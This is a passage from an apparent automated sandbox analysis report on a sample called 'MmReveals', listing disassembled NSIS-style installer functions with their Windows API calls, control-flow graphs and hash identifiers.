                          • Associated: 00000003.00000002.1749959907.0000000000461000.00000004.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1750129896.00000000004F4000.00000002.00000001.01000000.00000008.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_400000_MmReveals.jbxd
                          Similarity
                          • API ID: AllocByteCharFileGlobalMultiWideWritelstrlen
                          • String ID:
                          • API String ID: 2568930968-0
                          • Opcode ID: a43f8298630559bd8253c369c7e0cb3863940d209ccab43e1d506770e08af364
                          • Instruction ID: 5d007b3c2ae3d1ce6b2586a1921c4ad46276280cee2e515d5d1d957ff8a092fa
                          • Opcode Fuzzy Hash: a43f8298630559bd8253c369c7e0cb3863940d209ccab43e1d506770e08af364
                          • Instruction Fuzzy Hash: 76016171500205FBDB14AF70DE48D9E3B78EF05359F10443AF646B91E1D6798982DB68
                          Function 004021B5 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 54COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 711 4021b5-40220b call 40145c * 4 call 404f72 ShellExecuteW 722 402223-4030f2 call 4062a3 711->722 723 40220d-40221b call 4062a3 711->723 723->722
                          APIs
                            • Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
                            • Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
                            • Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB), ref: 00404FCD
                            • Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
                            • Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
                            • Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
                            • Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D
                          • ShellExecuteW.SHELL32(?,00000000,00000000,00000000,004CB0B0,?), ref: 00402202
                            • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                            • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                          Strings
                          • ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d, xrefs: 00402211
                          • ExecShell: success ("%s": file:"%s" params:"%s"), xrefs: 00402226
                          Memory Dump Source
                          • Source File: 00000003.00000002.1749837140.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000003.00000002.1749821392.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1749854145.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1749959907.000000000040B000.00000004.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1749959907.000000000041F000.00000004.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1749959907.0000000000461000.00000004.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1750129896.00000000004F4000.00000002.00000001.01000000.00000008.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_400000_MmReveals.jbxd
                          Similarity
                          • API ID: MessageSendlstrlen$ExecuteShellTextWindowlstrcatwvsprintf
                          • String ID: ExecShell: success ("%s": file:"%s" params:"%s")$ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d
                          • API String ID: 3156913733-2180253247
                          • Opcode ID: a6f9f0949098482436c6c9f8cce42b162511fb53d9db31c2e6f8192b5b466978
                          • Instruction ID: bbc106df3db47d5a89d2587a4e22f40687ed87c50c6518a2742e337a88eb4af1
                          • Opcode Fuzzy Hash: a6f9f0949098482436c6c9f8cce42b162511fb53d9db31c2e6f8192b5b466978
                          • Instruction Fuzzy Hash: E001F7B2B4021476DB2077B69C87F6B2A5CDB41764B20047BF502F20E3E5BD88009139
                          Function 00405E7F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 731 405e7f-405e8b 732 405e8c-405ec0 GetTickCount GetTempFileNameW 731->732 733 405ec2-405ec4 732->733 734 405ecf-405ed1 732->734 733->732 736 405ec6 733->736 735 405ec9-405ecc 734->735 736->735
                          APIs
                          • GetTickCount.KERNEL32 ref: 00405E9D
                          • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,004037FE,004D30C0,004D70C8), ref: 00405EB8
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.1749837140.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000003.00000002.1749821392.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1749854145.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1749959907.000000000040B000.00000004.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1749959907.000000000041F000.00000004.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1749959907.0000000000461000.00000004.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1750129896.00000000004F4000.00000002.00000001.01000000.00000008.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_400000_MmReveals.jbxd
                          Similarity
                          • API ID: CountFileNameTempTick
                          • String ID: nsa
                          • API String ID: 1716503409-2209301699
                          • Opcode ID: 74c86182fa67e47248f5fe200c9c22c18b8020e4291a34397a9b0f642818afda
                          • Instruction ID: bbb7b3741c82bae03d84fc31e008e00914f4f4b6280f54d22115683b6c602e07
                          • Opcode Fuzzy Hash: 74c86182fa67e47248f5fe200c9c22c18b8020e4291a34397a9b0f642818afda
                          • Instruction Fuzzy Hash: 39F0F635600604BBDB00CF55DD05A9FBBBDEF90310F00803BE944E7140E6B09E00C798
                          Function 004078C5 Relevance: 5.2, APIs: 4, Instructions: 238COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 737 4078c5-4078cb 738 4078d0-4078eb 737->738 739 4078cd-4078cf 737->739 740 407aeb-407aff 738->740 741 407bad-407bba 738->741 739->738 743 407b01-407b17 740->743 744 407b19-407b2c 740->744 742 407be7-407beb 741->742 745 407c4a-407c5d 742->745 746 407bed-407c0c 742->746 747 407b33-407b3a 743->747 744->747 750 407c65-407c68 745->750 751 407c25-407c39 746->751 752 407c0e-407c23 746->752 748 407b61-407b64 747->748 749 407b3c-407b40 747->749 748->750 753 407b46-407b5e 749->753 754 407ccd-407cd4 749->754 758 407350 750->758 759 407cec 750->759 755 407c3c-407c43 751->755 752->755 753->748 757 407cdd-407cea 754->757 760 407be1-407be4 755->760 761 407c45 755->761 762 407cef-407cf6 757->762 763 407357-40735b 758->763 764 40749b-4074b6 758->764 765 40746d-407471 758->765 766 4073ff-407403 758->766 759->762 760->742 768 407cd6 761->768 769 407bc6-407bde 761->769 763->757 771 407361-40736e 763->771 764->740 772 407c76-407c7d 765->772 773 407477-40748b 765->773 774 407409-407420 766->774 775 407c6d-407c74 766->775 768->757 769->760 771->759 776 407374-4073ba 771->776 772->757 777 40748e-407496 773->777 778 407423-407427 774->778 775->757 780 4073e2-4073e4 776->780 781 4073bc-4073c0 776->781 777->765 782 407498 777->782 778->766 779 407429-40742f 778->779 783 407431-407438 779->783 784 407459-40746b 779->784 787 4073f5-4073fd 780->787 788 4073e6-4073f3 780->788 785 4073c2-4073c5 GlobalFree 781->785 786 4073cb-4073d9 GlobalAlloc 781->786 782->764 789 407443-407453 GlobalAlloc 783->789 790 40743a-40743d GlobalFree 783->790 784->777 785->786 786->759 791 4073df 786->791 787->778 788->787 788->788 789->759 789->784 790->789 791->780
                          Memory Dump Source
                          • Source File: 00000003.00000002.1749837140.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000003.00000002.1749821392.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1749854145.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1749959907.000000000040B000.00000004.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1749959907.000000000041F000.00000004.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1749959907.0000000000461000.00000004.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1750129896.00000000004F4000.00000002.00000001.01000000.00000008.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_400000_MmReveals.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 34a0988d6b53cb3e5c5cab68a25a042cd6e02f2342b0fd139447399893daab40
                          • Instruction ID: 5b61ba0e549d4a34e11b5feda41afe9ae6537485a044c30e59ebd23bda5797f4
                          • Opcode Fuzzy Hash: 34a0988d6b53cb3e5c5cab68a25a042cd6e02f2342b0fd139447399893daab40
                          • Instruction Fuzzy Hash: BCA14771908248DBEF18CF28C8946AD3BB1FB44359F14812AFC56AB280D738E985DF85
                          Function 00407AC3 Relevance: 5.2, APIs: 4, Instructions: 211COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 792 407ac3-407ac7 793 407ac9-407bba 792->793 794 407ade-407ae4 792->794 804 407be7-407beb 793->804 796 407aeb-407aff 794->796 797 407b01-407b17 796->797 798 407b19-407b2c 796->798 801 407b33-407b3a 797->801 798->801 802 407b61-407b64 801->802 803 407b3c-407b40 801->803 807 407c65-407c68 802->807 805 407b46-407b5e 803->805 806 407ccd-407cd4 803->806 808 407c4a-407c5d 804->808 809 407bed-407c0c 804->809 805->802 810 407cdd-407cea 806->810 816 407350 807->816 817 407cec 807->817 808->807 812 407c25-407c39 809->812 813 407c0e-407c23 809->813 815 407cef-407cf6 810->815 814 407c3c-407c43 812->814 813->814 823 407be1-407be4 814->823 824 407c45 814->824 818 407357-40735b 816->818 819 40749b-4074b6 816->819 820 40746d-407471 816->820 821 4073ff-407403 816->821 817->815 818->810 825 407361-40736e 818->825 819->796 826 407c76-407c7d 820->826 827 407477-40748b 820->827 829 407409-407420 821->829 830 407c6d-407c74 821->830 823->804 831 407cd6 824->831 832 407bc6-407bde 824->832 825->817 833 407374-4073ba 825->833 826->810 834 40748e-407496 827->834 835 407423-407427 829->835 830->810 831->810 832->823 837 4073e2-4073e4 833->837 838 4073bc-4073c0 833->838 834->820 839 407498 834->839 835->821 836 407429-40742f 835->836 840 407431-407438 836->840 841 407459-40746b 836->841 844 4073f5-4073fd 837->844 845 4073e6-4073f3 837->845 842 4073c2-4073c5 GlobalFree 838->842 843 4073cb-4073d9 GlobalAlloc 838->843 839->819 846 407443-407453 GlobalAlloc 840->846 847 40743a-40743d GlobalFree 840->847 841->834 842->843 843->817 848 4073df 843->848 844->835 845->844 845->845 846->817 846->841 847->846 848->837
                          Memory Dump Source
                          • Source File: 00000003.00000002.1749837140.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000003.00000002.1749821392.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1749854145.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1749959907.000000000040B000.00000004.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1749959907.000000000041F000.00000004.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1749959907.0000000000461000.00000004.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1750129896.00000000004F4000.00000002.00000001.01000000.00000008.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_400000_MmReveals.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 5706958415abe038d8bc904968b39eb1c0ab21271a5e62a9b552e9204fe8a243
                          • Instruction ID: 0868455ade8710e2db62ea7c97591ecaf8a07f5330254cde648c5a00cf1b77b0
                          • Opcode Fuzzy Hash: 5706958415abe038d8bc904968b39eb1c0ab21271a5e62a9b552e9204fe8a243
                          • Instruction Fuzzy Hash: 30912871908248DBEF14CF18C8947A93BB1FF44359F14812AFC5AAB291D738E985DF89
                          Function 00407312 Relevance: 5.2, APIs: 4, Instructions: 201COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 849 407312-407330 850 407332-407335 849->850 851 40733a-407341 849->851 852 407cf0-407cf6 850->852 853 407344-40734a 851->853 854 407350 853->854 855 407cec 853->855 856 407357-40735b 854->856 857 40749b-407aff 854->857 858 40746d-407471 854->858 859 4073ff-407403 854->859 860 407cef 855->860 861 407361-40736e 856->861 862 407cdd-407cea 856->862 870 407b01-407b17 857->870 871 407b19-407b2c 857->871 863 407c76-407c7d 858->863 864 407477-40748b 858->864 866 407409-407420 859->866 867 407c6d-407c74 859->867 860->852 861->855 868 407374-4073ba 861->868 862->860 863->862 869 40748e-407496 864->869 872 407423-407427 866->872 867->862 874 4073e2-4073e4 868->874 875 4073bc-4073c0 868->875 869->858 876 407498 869->876 877 407b33-407b3a 870->877 871->877 872->859 873 407429-40742f 872->873 880 407431-407438 873->880 881 407459-40746b 873->881 884 4073f5-4073fd 874->884 885 4073e6-4073f3 874->885 882 4073c2-4073c5 GlobalFree 875->882 883 4073cb-4073d9 GlobalAlloc 875->883 876->857 878 407b61-407c68 877->878 879 407b3c-407b40 877->879 878->853 886 407b46-407b5e 879->886 887 407ccd-407cd4 879->887 888 407443-407453 GlobalAlloc 880->888 889 40743a-40743d GlobalFree 880->889 881->869 882->883 883->855 891 4073df 883->891 884->872 885->884 885->885 886->878 887->862 888->855 888->881 889->888 891->874
                          Memory Dump Source
                          • Source File: 00000003.00000002.1749837140.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000003.00000002.1749821392.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1749854145.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1749959907.000000000040B000.00000004.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1749959907.000000000041F000.00000004.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1749959907.0000000000461000.00000004.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1750129896.00000000004F4000.00000002.00000001.01000000.00000008.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_400000_MmReveals.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 11cd2314bdb72fbaaf254cc8ab9d4ea11bc1da16cf3644787fbca669908488dc
                          • Instruction ID: 3981f1dd08afc316d24d9ed5113be2a17ca7da729ed8f25fba603efd3ef4d826
                          • Opcode Fuzzy Hash: 11cd2314bdb72fbaaf254cc8ab9d4ea11bc1da16cf3644787fbca669908488dc
                          • Instruction Fuzzy Hash: 39815931908248DBEF14CF29C8446AE3BB1FF44355F10812AFC66AB291D778E985DF86
                          Function 00407752 Relevance: 5.2, APIs: 4, Instructions: 179COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.1749837140.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000003.00000002.1749821392.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1749854145.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1749959907.000000000040B000.00000004.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1749959907.000000000041F000.00000004.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1749959907.0000000000461000.00000004.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1750129896.00000000004F4000.00000002.00000001.01000000.00000008.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_400000_MmReveals.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: f6fc324ba2a3154e694309e6bae2168c7942ffc843c4c16a3e425845c98615c2
                          • Instruction ID: 01891581271c5a124b16634c3a8992e7a6857e255b4271240234ec945a90a24d
                          • Opcode Fuzzy Hash: f6fc324ba2a3154e694309e6bae2168c7942ffc843c4c16a3e425845c98615c2
                          • Instruction Fuzzy Hash: 73713571908248DBEF18CF28C894AAD3BF1FB44355F14812AFC56AB291D738E985DF85
                          Function 00407854 Relevance: 5.2, APIs: 4, Instructions: 169COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.1749837140.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000003.00000002.1749821392.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1749854145.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1749959907.000000000040B000.00000004.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1749959907.000000000041F000.00000004.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1749959907.0000000000461000.00000004.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1750129896.00000000004F4000.00000002.00000001.01000000.00000008.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_400000_MmReveals.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 50afaaeaa81713190e6368922b68e72c74c0f8af07b8473edddf34e42917c2b6
                          • Instruction ID: 94e3b44a92ae0aa4503ed5f8848dd13d39bc4d5c5e61625994f203468061122b
                          • Opcode Fuzzy Hash: 50afaaeaa81713190e6368922b68e72c74c0f8af07b8473edddf34e42917c2b6
                          • Instruction Fuzzy Hash: 25713671908248DBEF18CF19C894BA93BF1FB44345F10812AFC56AA291C738E985DF86
                          Function 004077B2 Relevance: 5.2, APIs: 4, Instructions: 166COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.1749837140.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000003.00000002.1749821392.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1749854145.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1749959907.000000000040B000.00000004.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1749959907.000000000041F000.00000004.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1749959907.0000000000461000.00000004.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1750129896.00000000004F4000.00000002.00000001.01000000.00000008.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_400000_MmReveals.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: c1e8f36220be8f98feef1199d10cba6751babd433578914259dc57061f930aad
                          • Instruction ID: 61f7b93237898aea062553d5d4b8719da8ac7eccb5076a10c91df3859b53dd49
                          • Opcode Fuzzy Hash: c1e8f36220be8f98feef1199d10cba6751babd433578914259dc57061f930aad
                          • Instruction Fuzzy Hash: 98612771908248DBEF18CF19C894BAD3BF1FB44345F14812AFC56AA291C738E985DF86
                          Function 00407C5F Relevance: 5.2, APIs: 4, Instructions: 156memoryCOMMON
                          Download Yara Rule
                          APIs
                          • GlobalFree.KERNELBASE(?), ref: 004073C5
                          • GlobalAlloc.KERNELBASE(00000040,?,00000000,0041F150,00004000), ref: 004073CE
                          • GlobalFree.KERNELBASE(?), ref: 0040743D
                          • GlobalAlloc.KERNELBASE(00000040,?,00000000,0041F150,00004000), ref: 00407448
                          Memory Dump Source
                          • Source File: 00000003.00000002.1749837140.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000003.00000002.1749821392.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1749854145.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1749959907.000000000040B000.00000004.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1749959907.000000000041F000.00000004.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1749959907.0000000000461000.00000004.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1750129896.00000000004F4000.00000002.00000001.01000000.00000008.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_400000_MmReveals.jbxd
                          Similarity
                          • API ID: Global$AllocFree
                          • String ID:
                          • API String ID: 3394109436-0
                          • Opcode ID: b4e0c1391c46ae50f73649b3c762cd7b27ce57b462bacfc2a9e8da119b19f928
                          • Instruction ID: da36524f31269fd1e9de8fc6705d7123eeae9c681c0d19372ba3dadca10d6d3f
                          • Opcode Fuzzy Hash: b4e0c1391c46ae50f73649b3c762cd7b27ce57b462bacfc2a9e8da119b19f928
                          • Instruction Fuzzy Hash: 81513871918248EBEF18CF19C894AAD3BF1FF44345F10812AFC56AA291C738E985DF85
                          Function 0040139D Relevance: 3.0, APIs: 2, Instructions: 42windowCOMMON
                          Download Yara Rule
                          APIs
                          • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013F6
                          • SendMessageW.USER32(00000402,00000402,00000000), ref: 00401406
                          Memory Dump Source
                          • Source File: 00000003.00000002.1749837140.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000003.00000002.1749821392.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1749854145.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1749959907.000000000040B000.00000004.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1749959907.000000000041F000.00000004.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1749959907.0000000000461000.00000004.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1750129896.00000000004F4000.00000002.00000001.01000000.00000008.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_400000_MmReveals.jbxd
                          Similarity
                          • API ID: MessageSend
                          • String ID:
                          • API String ID: 3850602802-0
                          • Opcode ID: 5a31974c6ff286c329462761e498969acf5a6972bf7682297af78da516706e42
                          • Instruction ID: d71d45502f518029c3ce7990b7c8d381ac94a1bb539c673c2af025244294d997
                          • Opcode Fuzzy Hash: 5a31974c6ff286c329462761e498969acf5a6972bf7682297af78da516706e42
                          • Instruction Fuzzy Hash: 96F0F471A10220DFD7555B74DD04B273699AB80361F24463BF911F62F1E6B8DC528B4E
                          Function 00405E50 Relevance: 3.0, APIs: 2, Instructions: 15fileCOMMON
                          Download Yara Rule
                          APIs
                          • GetFileAttributesW.KERNELBASE(00000003,004035C7,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00405E54
                          • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A47,?), ref: 00405E76
                          Memory Dump Source
                          • Source File: 00000003.00000002.1749837140.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000003.00000002.1749821392.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1749854145.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1749959907.000000000040B000.00000004.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1749959907.000000000041F000.00000004.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1749959907.0000000000461000.00000004.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1750129896.00000000004F4000.00000002.00000001.01000000.00000008.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_400000_MmReveals.jbxd
                          Similarity
                          • API ID: File$AttributesCreate
                          • String ID:
                          • API String ID: 415043291-0
                          • Opcode ID: 6f817a4f04f8c8cc68f88398dd52813d28edb2112aa12cde00d29204b34f1fbe
                          • Instruction ID: fe2e31f24f36ecb58ba6038de6e4569557e5a61990f2f31681ab57118d472e11
                          • Opcode Fuzzy Hash: 6f817a4f04f8c8cc68f88398dd52813d28edb2112aa12cde00d29204b34f1fbe
                          • Instruction Fuzzy Hash: BCD09E71554202EFEF098F60DE1AF6EBBA2FB94B00F11852CB292550F0DAB25819DB15
                          Function 00405E30 Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                          Download Yara Rule
                          APIs
                          • GetFileAttributesW.KERNELBASE(?,00406E81,?,?,?), ref: 00405E34
                          • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405E47
                          Memory Dump Source
                          • Source File: 00000003.00000002.1749837140.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000003.00000002.1749821392.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1749854145.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1749959907.000000000040B000.00000004.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1749959907.000000000041F000.00000004.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1749959907.0000000000461000.00000004.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1750129896.00000000004F4000.00000002.00000001.01000000.00000008.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_400000_MmReveals.jbxd
                          Similarity
                          • API ID: AttributesFile
                          • String ID:
                          • API String ID: 3188754299-0
                          • Opcode ID: 404706a0ec70c465fc6e77d3f379a59e81a865ab84cdc077efcd7274a0164b66
                          • Instruction ID: a99f375bd2b1051765f890e1d94d2f722c1bb1ba0a12d38356d8610c0186b9c0
                          • Opcode Fuzzy Hash: 404706a0ec70c465fc6e77d3f379a59e81a865ab84cdc077efcd7274a0164b66
                          • Instruction Fuzzy Hash: 84C01272404800EAC6000B34DF0881A7B62AB90330B268B39B0BAE00F0CB3488A99A18
                          Function 00403336 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                          Download Yara Rule
                          APIs
                          • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,000000FF,?,004033CE,000000FF,00000004,00000000,00000000,00000000), ref: 0040334D
                          Memory Dump Source
                          • Source File: 00000003.00000002.1749837140.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000003.00000002.1749821392.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1749854145.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1749959907.000000000040B000.00000004.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1749959907.000000000041F000.00000004.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1749959907.0000000000461000.00000004.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000003.00000002.1750129896.00000000004F4000.00000002.00000001.01000000.00000008.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_400000_MmReveals.jbxd
                          Similarity
                          • API ID: FileRead
                          • String ID:
                          • API String ID: 2738559852-0
                          • Opcode ID: 1a43d381f500bc8dc9f00bbbc079669c25ab728c1eaf5fecfa5fd6a2526f4c39
                          • Instruction ID: a3bc5d39330dd194e4c7332763fdc94ca13499671d705f1c19c6925397c50364
                          • Opcode Fuzzy Hash: 1a43d381f500bc8dc9f00bbbc079669c25ab728c1eaf5fecfa5fd6a2526f4c39
                          • Instruction Fuzzy Hash: C8E08C32550118BFCB109EA69C40EE73B5CFB047A2F00C832BD55E5290DA30DA00EBE8
                          Function 004037CC Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00406038: CharNextW.USER32(?,*?|<>/":,00000000,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 0040609B
                            • Part of subcall function 00406038: CharNextW.USER32(?,?,?,00000000), ref: 004060AA
                            • Part of subcall function 00406038: CharNextW.USER32(?,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060AF
                            • Part of subcall function 00406038: CharPrevW.USER32(?,?,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060C3
                          • CreateDirectoryW.KERNELBASE(004D70C8,00000000,004D70C8,004D70C8,004D70C8,-00000002,00403A0B), ref: 004037ED
                          Memory Dump Source
